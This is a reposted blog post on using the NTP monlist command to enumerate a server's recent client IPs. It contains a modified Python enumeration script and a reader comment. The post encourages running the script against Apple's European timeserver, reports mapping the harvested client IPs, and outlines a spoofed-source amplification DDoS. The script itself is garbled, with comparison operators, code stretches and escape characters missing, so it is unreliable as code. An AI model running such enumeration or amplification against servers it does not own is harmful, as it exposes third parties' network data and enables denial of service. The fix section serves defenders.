Using NTP to Enumerate Client IPs

  • A+
所属分类:lcx

转自:https://www.securepla.net/using-ntp-to-enumerate-client-ips/


THE NTP ISSUE [PDF Version Here]

The buzz around the internets lately has been about NTP. Security researchers, such as HD Moore, have been doing extensive investigation on the “features” of NTP. HD Moore discovered that, by default, NTP servers allow you to query them for additional information. Some of the basic queries were listpeers, show peers, peers, sysstat, and most important monlist.

Monlist is used as a diagnostic tool to provide the user the last 600 IP addresses of clients who queried that NTP server. What does this mean? This means with a single request, you can get a good feel of all the IPs in a network. Also, if there is an NTP server in the DMZ, an external attacker could potentially get the internal IPs.

FYI: I haven’t been successful with attacking Windows version of NTP.

SO WHAT’S THE TRICK:

You can install the NTP client on your favorite nix and run:

ntpdc -n -c monlist

But this seems to only work half of the time. It seems as sometimes the sequence numbers get messed up and it crashes. You can use the new auxiliary tool from metasploit (ntp_monlist) or sensepost’s python tool, but both those have issues due to payloads that do not support version 3 of ntp. They only support version 2. The best tool is included called ntp_ip_enum.txt (click to view) which is a version of the sensepost script that I had modified the payloads allowing both NTP version 2 and version 3.

COMMAND: NTP_IP_ENUM.TXT

./ntp_ip_enum.py

When this is complete, an output file is created in the directory where the ntp_ip_enum script was run labeled NTP.txt. This will include the clients that have connected to that NTP server within the last 5 minutes or last 600 requests.

Give it a try:

./ntp_ip_enum.py time.euro.apple.com

This will give you a list of clients that have recently contacted Apple’s Europe timeserver. Wowzers!

SCRAPING THE INTERNETS NTP

MAPPING TIME.EURO.APPLE.COM

So I took the entire client IP’s listed from time.euro.apple.com and plotted them against Google earth. This gave us some interesting views on which countries use Apple laptops and which do not.

Apple's EURO NTP Server

THE FIX

This could have all been averted by not allowing external users to query these types of commands. Monlist is usually used for debugging but should only be allowed locally.

ADDITIONAL ATTACKS

HD Moore also discussed that he had figured out a way to DDoS a system using NTP with very minimal requests. Although he has not released data on this type of DDoS, we put our heads together here on what the attack could be. When you make a monlist request, you send 1 udp packet to the NTP server and 600+ responses are returned. We think that using this request against all the NTP servers and peers, you could send hundreds of thousands of UDP packets to a victim with minimal request packets. By spoofing the source address and requesting monlists repetitively, all responses from those NTP servers will be forwarded to the victim.

-Cheetz


#!/usr/bin/env python
"""
Basic script to pull addresses from a NTP server using the monlist command. Can also output Maltego resultset.

Gert Burger 
SensePost (Pty) Ltd
www.sensepost.com

This work is licensed under the Creative Commons Attribution 2.5 South Africa License available at http://creativecommons.org/licenses/by/2.5/za/

Edited by SECUREPLA.NET
"""
from struct import unpack, pack
import socket
import select
import sys
import string

OUTPUT_FORMAT='normal'  #'maltego' for maltego xml or any other string for normal output 
DEBUG=False             #Enables basic debug info
TIMEOUT=2               #Read timeout in seconds
TRIES=3                 #Number of times to do the monlist request
filename="NTP.txt"


def int_ip_to_str(ip_num):
    return socket.inet_ntoa(pack('!L', ip_num))

def str_ip_to_int(ip):
    return unpack('!L',socket.inet_aton(ip))

def get_payload():
    return """x17x00x02x2ax00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"""

def parse_monlist_packet(data):
    result = dict(response=False, more=False, error=None, records=[])

    if len(data)  0
    result['more'] = ntp_flags & (1  0

    if not result['response']: #Return if its a request
        result['error'] = "REQUEST_PACKET"
    elif ntp_req_code == 42: #Check if its a monlist packet
        if DEBUG: print "item_size[%s] tnum_items[%s] tlen(data)[%s]" % (item_size, num_items, len(data))

        if item_size != 32:
            result['error'] = "WRONG_ITEM_SIZE"
        elif num_items = TRIES:
                break
            send_payload(sock, ntp_server)

    return list(results)


def print_maltego(results):
    from xml.dom.minidom import Document
    doc = Document()
    mm = doc.createElement('MaltegoMessage')
    doc.appendChild(mm)
    mtrm = doc.createElement('MaltegoTransformResponseMessage')
    mm.appendChild(mtrm)
    entities = doc.createElement('Entities')
    mtrm.appendChild(entities)

    for result in results:
        entity = doc.createElement('Entity')
        entity.setAttribute('Type', 'IPAddress')

        value = doc.createElement('Value')
        value_node = doc.createTextNode(result)

        value.appendChild(value_node)
        entity.appendChild(value)
        entities.appendChild(entity)

    output = doc.toxml()
    print output[output.index(" so that maltego can function


if __name__ == '__main__':
    if len(sys.argv) > 1:
        targets = sys.argv[1:]	
    else:
        print "Usage: %s target ntp serversnnThis script will return a unique set of IP's obtained from the list of ntp servers via the monlist command" % sys.argv[0]
        sys.exit(-1)

    results = set()
    for target in targets:
        results.update(fetch(target))
    results = sorted(results, key=str_ip_to_int)

    if str(OUTPUT_FORMAT).lower() == 'maltego':
        print_maltego(results)
    else:
	FILE = open(filename,"a")
	FILE.writelines("-------------------------------NTP List------------------------------")
	FILE.writelines("n")
	FILE.writelines("Target host: ")
	FILE.writelines(targets)
	FILE.writelines("n")
	#print "n".join(results)
	FILE.writelines("n".join(results))
	FILE.writelines("n")        
	FILE.writelines("Number of results %s" % len(results))
	print "Completed.  Check NTP.txt"

#spidermark sensepostdata ntp_monlist.py

留言评论(旧系统):

佚名 @ 2014-06-12 02:46:13

有中文没

本站回复:

谷歌翻译:http://translate.google.cn/

文章来源于lcx.cc:Using NTP to Enumerate Client IPs

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: